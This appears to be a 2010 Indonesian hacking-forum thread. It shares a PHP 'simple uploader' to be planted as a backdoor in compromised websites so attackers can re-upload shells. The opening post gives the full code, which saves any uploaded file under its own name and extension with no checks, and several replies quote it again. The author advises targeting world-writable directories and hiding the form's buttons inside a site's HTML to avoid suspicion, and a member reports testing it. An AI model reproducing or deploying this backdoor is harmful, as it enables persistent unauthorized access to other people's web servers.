Simple Uploader

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Simple Uploader

Post by anharku » Sat Aug 21, 2010 11:41 pm

mungkin buat om2 yang hobinya nanem shell atau Backdoor dimana2
kalo shell kamu udagh gampang ketahuan ga ada salahnya nigh
ada tehnik2 yang mungkin bisa di coba... :devil
sisipin aja uploader di halaman/pagenya untuk codenya kayak gini nigh misalnya:
'---------------------------------------
<title> Simple Uploader</title>
<body bgcolor=”#000000? text=”#808080? link=”#808080? vlink=”#808080?>
<div align=”center”><br /><br /><center><font style=”font-size: 16pt;” color=”lime” face=”Arial”>simple uploader</font> <br /></center><br />

<form enctype=”multipart/form-data” action=”<?php echo $_SERVER["PHP_SELF"]; ?>” method=”post”>
<div align=”center” STYLE=”font-family: verdana; font-size: 10px;”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”10000000024?>
File :
<input name=”userfile” type=”file” />
<br />
<input name=”submit” type=”submit” value=”Upload” />
</div>
</form>
<div align=”center” STYLE=”font-family: verdana; font-size: 10px;”>
<?php
if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) {
copy($_FILES["userfile"]["tmp_name"], “” . $_FILES["userfile"]["name"]);
echo “<p>File uploaded successfully</p>”;
}
?>
'------------------------------------------------------------------------
dagh ya semoga bermanfaat tekniknya
kembangin sendiri yagh :maaf:

thanks to: r3m1ck
Top
User avatar
choiroel
Posts: 106
Joined: Tue Jun 09, 2009 2:19 am
Location: Pati | Yogjakarta
Contact:
Contact choiroel

Re: Simple Uploader

Post by choiroel » Sat Aug 21, 2010 11:45 pm

anharku
good.....!!! :love: :love:
Ketika Agamamu dan aliranmu itu kamu dapatkan dari lahir...gak perlu sok merasa benar...doktrin dan dogma memang begitu
Top
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Simple Uploader

Post by anharku » Sun Aug 22, 2010 9:41 am

makasih...
kembangin sendiri yagh...
intinya script itu bisa buat upload apa aja kok..
ekstensi apa aja :love:
Top
User avatar
.::Z10R::.
Posts: 34
Joined: Wed Jul 16, 2008 3:23 pm

Re: Simple Uploader

Post by .::Z10R::. » Mon Aug 23, 2010 11:54 am

bagi shell nya aja langsung :devil :devil :devil
Mencoba Pensiun dari game Online
Top
b0c4h
Posts: 193
Joined: Tue Aug 21, 2007 6:11 pm
Location: Jack

Re: Simple Uploader

Post by b0c4h » Tue Aug 24, 2010 6:26 am

anharku wrote:mungkin buat om2 yang hobinya nanem shell atau Backdoor dimana2
kalo shell kamu udagh gampang ketahuan ga ada salahnya nigh
ada tehnik2 yang mungkin bisa di coba... :devil
sisipin aja uploader di halaman/pagenya untuk codenya kayak gini nigh misalnya:
'---------------------------------------
<title> Simple Uploader</title>
<body bgcolor=”#000000? text=”#808080? link=”#808080? vlink=”#808080?>
<div align=”center”><br /><br /><center><font style=”font-size: 16pt;” color=”lime” face=”Arial”>simple uploader</font> <br /></center><br />

<form enctype=”multipart/form-data” action=”<?php echo $_SERVER["PHP_SELF"]; ?>” method=”post”>
<div align=”center” STYLE=”font-family: verdana; font-size: 10px;”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”10000000024?>
File :
<input name=”userfile” type=”file” />
<br />
<input name=”submit” type=”submit” value=”Upload” />
</div>
</form>
<div align=”center” STYLE=”font-family: verdana; font-size: 10px;”>
<?php
if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) {
copy($_FILES["userfile"]["tmp_name"], “” . $_FILES["userfile"]["name"]);
echo “<p>File uploaded successfully</p>”;
}
?>
'------------------------------------------------------------------------
dagh ya semoga bermanfaat tekniknya
kembangin sendiri yagh :maaf:

thanks to: r3m1ck
ini kudu liat file permision'a ga kk???misal'a harus di directory yg perm'a 777,klo di 775 bs ga ya....:D

.thx.
Love And Peace cannot Created without "RESPECT"
Top
User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:
Contact peniru

Re: Simple Uploader

Post by peniru » Tue Aug 24, 2010 7:03 am

anharku wrote:mungkin buat om2 yang hobinya nanem shell atau Backdoor dimana2
kalo shell kamu udagh gampang ketahuan ga ada salahnya nigh
ada tehnik2 yang mungkin bisa di coba... :devil
sisipin aja uploader di halaman/pagenya untuk codenya kayak gini nigh misalnya:
'---------------------------------------
<title> Simple Uploader</title>
<body bgcolor=”#000000? text=”#808080? link=”#808080? vlink=”#808080?>
<div align=”center”><br /><br /><center><font style=”font-size: 16pt;” color=”lime” face=”Arial”>simple uploader</font> <br /></center><br />

<form enctype=”multipart/form-data” action=”<?php echo $_SERVER["PHP_SELF"]; ?>” method=”post”>
<div align=”center” STYLE=”font-family: verdana; font-size: 10px;”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”10000000024?>
File :
<input name=”userfile” type=”file” />
<br />
<input name=”submit” type=”submit” value=”Upload” />
</div>
</form>
<div align=”center” STYLE=”font-family: verdana; font-size: 10px;”>
<?php
if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) {
copy($_FILES["userfile"]["tmp_name"], “” . $_FILES["userfile"]["name"]);
echo “<p>File uploaded successfully</p>”;
}
?>
'------------------------------------------------------------------------
dagh ya semoga bermanfaat tekniknya
kembangin sendiri yagh :maaf:

thanks to: r3m1ck
usagena tinggal inject kek html inject gitu yah oms anhar??
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
Top
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Simple Uploader

Post by anharku » Tue Aug 24, 2010 9:13 am

b0c4h wrote:
ini kudu liat file permision'a ga kk???misal'a harus di directory yg perm'a 777,klo di 775 bs ga ya....:D

.thx.
iya lagh lihat permis juga baiknya yang 777 biar bener2 ke upload :devil
usagena tinggal inject kek html inject gitu yah oms anhar??
bener om injectin aja ke htmlnya mungkin dengan sedikit pengembangan gimana gitu biar tombol2nya ga kelihatan jadi tidak terlalu mencurigakan :devil
Top
User avatar
demonbrando
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: Simple Uploader

Post by demonbrando » Tue Aug 24, 2010 11:34 pm

ijin belajar om anhar... :maaf: :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
Top
NeOS-01
Posts: 144
Joined: Fri Aug 20, 2010 5:40 pm

Re: Simple Uploader

Post by NeOS-01 » Wed Aug 25, 2010 2:43 pm

Cara injek nya gmn??maklum q masih newbe
Saya masih selalu merasa newbe
Top
User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:
Contact peniru

Re: Simple Uploader

Post by peniru » Sat Aug 28, 2010 11:51 am

wha maknyos ni uploader.. dah ane test.. cooll... tq oms anhar.. cuman butuh di edit pada beberapa sisi... kalo cuman copas yah pasti ada errorna...

maap kalo salah ya om anhar.. cus masi noobie :circle: :circle:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
Top
Post Reply

Return to “Web Hacking”